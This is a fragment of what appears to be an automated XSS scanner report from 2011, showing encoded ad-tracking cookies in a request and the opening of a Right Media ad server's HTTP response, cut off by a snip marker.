bh="b!!!%/!!!?J!!!!)='htq!!(1-!!!!,='htq!!*10!!!!#='hvv!!*lZ!!!!#=$Wj6!!*oY!!!!%='hvv!!,WM!!!!#=$Wj6!!-?2!!!!*='hvv!!..X!!!!'=$L=p!!/GK!!!!,='htq!!/GR!!!!,='htq!!/Ju!!!!$='htq!!/K$!!!!'='htq!!/i,!!!!+='hvv!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2)!!!!!+='hvv!!2*J!!!!#=%=bB!!3ba!!!!%='7bV!!4F0!!!!'='htq!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=$G$l!!J<J!!!!-='htq!!J<K!!!!-='htq!!J<O!!!!+='htq!!J<S!!!!-='htq!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OgU!!!!+='hvv!!PKh!!!!#=$G$!!!PL)!!!!#=$G$!!!PL`!!!!$=$G$!!!Phu!!!!%='hvv!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!Zwa!!!!*='hvv!!Zwb!!!!%='hvv!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!-='htq!!j,.!!<NC=$G$l!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!kl+!!!!%='hvv!!kl,!!!!%='hvv!!mL?!!!!#=%=pu!!mo!!!!!%='hvv!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!t^6!!!!%=!Tiu!!tjQ!!!!%='hvv!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#+]S!!!!+='hvv!#-B#!!!!#=$G#-!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0Ei!!!!#=$GZg!#0[r!!!!#=#32s!#16I!!<NC=$G$l!#2%T!!!!$=#pxy!#2.i!!!!#=$G$!!#2g8!!!!#=%=bG!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#5(c!!!!#=%H`<!#6f-!!!!#=!iRq!#7(x!!!!#='hvv!#7)S!!!!#='hvv!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#8R^!!!!#=!iRa!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#C@M!!!!#=!iK@!#D![!!!!#=%if4!#D`%!!!!+='htq!#DpD!!!!#=$GZg!#Dri!!!!#=#ytJ!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!+='htq!#MTF!!!!'=%=]S!#MTH!!!!-='htq!#MTI!!!!-='htq!#MTJ!!!!-='htq!#Nyi!!!!#=!eq^!#O29!!!!)='hvv!#O@L!!<NC=$G$l!#O@M!!<NC=$G$l!#O_8!!!!'=$$NV!#Os.!!!!#='hvv!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!#=#T`h!#SV*!!!!+='hvv!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!#='htq!#UDQ!!!!-='htq!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#XF5!!!!#=%=bI!#Z8A!!!!%='hvv!#Z8E!!!!*='hvv!#Zgo!!!!#='hvv!#ZhT!!!!#='hvv!#]%`!!!!$='i$P!#]*j!!!!#=#pxY!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!#='htq!#]Uq!!!!#='htq!#]Uy!!!!#='htq!#]Z!!!!!)='hvv!#]Z#!!!!%='hvv!#]w)!!!!+='htq!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^0%!!!!+='hvv!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-7!!!!*='hvv!#`-Z!!!!%='htq!#`-[!!!!%='htq!#`cS!!!!#=%id8!#a=6!!!!%='hvv!#a=7!!!!%='hvv!#a=9!!!!%='hvv!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bBg!!!!#=!iRr!#bTx!!!!#=%if4!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8V!!!!)='hvv!#c8X!!!!)='hvv!#c8c!!!!)='hvv!#c8i!!!!)='hvv!#c8m!!!!)='hvv!#c8p!!!!)='hvv!#dCX!!!!%=!c>6!#dWf!!!!#=#mS:!#eDE!!!!#=#[2T!#eSD!!!!(=$_d[!#fBj!!!!*='hvv!#fBk!!!!*='hvv!#fBm!!!!*='hvv!#fBn!!!!*='hvv!#fFG!!!!#=#T_g!#fG)!!!!%='hvv!#fG+!!!!%='hvv!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g/7!!!!+='hvv!#g=r!!!!%='hvv!#gS,!!!!#='i$2!#h.N!!!!#=#M8b!#k[Y!!!!#=#mS:!#n`.!!!!#=$Fss!#nci!!!!#=$_di!#oTw!!!!#=#mS:!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#p]R!!!!#=$Fss!#q+A!!!!#='htq!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#r-[!!!!#=!c8Z!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#slj!!!!#=#T_f!#t<c!!!!#='hvv!#tM)!!!!$=%=]S!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uR1!!!!#='hvv!#uR3!!!!%='hvv!#uR7!!!!*='hvv!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!#='htq!#wYG!!!!#=$GXv!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xG5!!!!#=!yuk!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!#='htq!$#X4!!!!#=#%VO!$#yu!!!!+='htq!$$K<!!!!#=#$.g!$$rQ!!!!#='hvv!$'/S!!!!#=#mS:!$'/Y!!!!#=#mS:!$'@Q!!!!%='hvv!$(!P!!!!*='hvv!$(:q!!!!#=$Fss!$(Gt!!!!'=%=]S!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$*hf!!!!%='hvv!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,gE!!!!$=!iQt!$,jw!!!!#=#mS:!$-'0!!!!#='i$,!$-rx!!!!#=$GXw!$.#F!!!!$=#qP5!$._W!!!!#='i+,!$0V+!!!!#='htq"; ih="b!!!!J!'4@g!!!!#=$KA3!)AU6!!!!#='htn!-5BI!!!!$=$J^*!-ru2!!!!#=$K9.!.#:A!!!!#=$L#)!.#:D!!!!#='htp!.`.U!!!!#='htS!/JVV!!!!%='j!9!/[[9!!!!#=$L5r!/noe!!!!$=%=]O!0)2c!!!!#=$Jsh!0QGc!!!!#=$IeW!0Q]c!!!!#=%3V4!0eaS!!!!$=$Jui!19x/!!!!%=$L6>!1@m6!!!!$=%3V#!1UC$!!!!#=$G!=!1e75!!!!#=%3V6!1mH9!!!!#=!i98!1pQ3!!!!#=#32s!1qGe!!!!#=%1p'!23o_!!!!'=$Ks'!2817!!!!#=$L6.!282@!!!!$=$L5n!29j+!!!!6=$LYE!29j-!!!!#=#32k!29j/!!!!7=$LgV!29j6!!!!7=$Lth!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2A@,!!!!#=$Ju6!2GG7!!!!#=$J4M!2N-f!!!!B=$LJ>!2N7y!!!!$=$L=v!2NNL!!!!$=$L6,!2NO)!!!!$=$Ju2!2`+,!!!!#='hw!!2gH2!!!!#='i#o"; vuday1=!!!!#?:rWHV9*LS4M6Eq4M6EqGf(n`NBHr8YZ_?H; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:22 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 13 Jun 2011 14:11:22 GMT
Pragma: no-cache
Content-Length: 5852
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
Report generated by XSS.CX at Tue Jun 14 08:10:34 CDT 2011.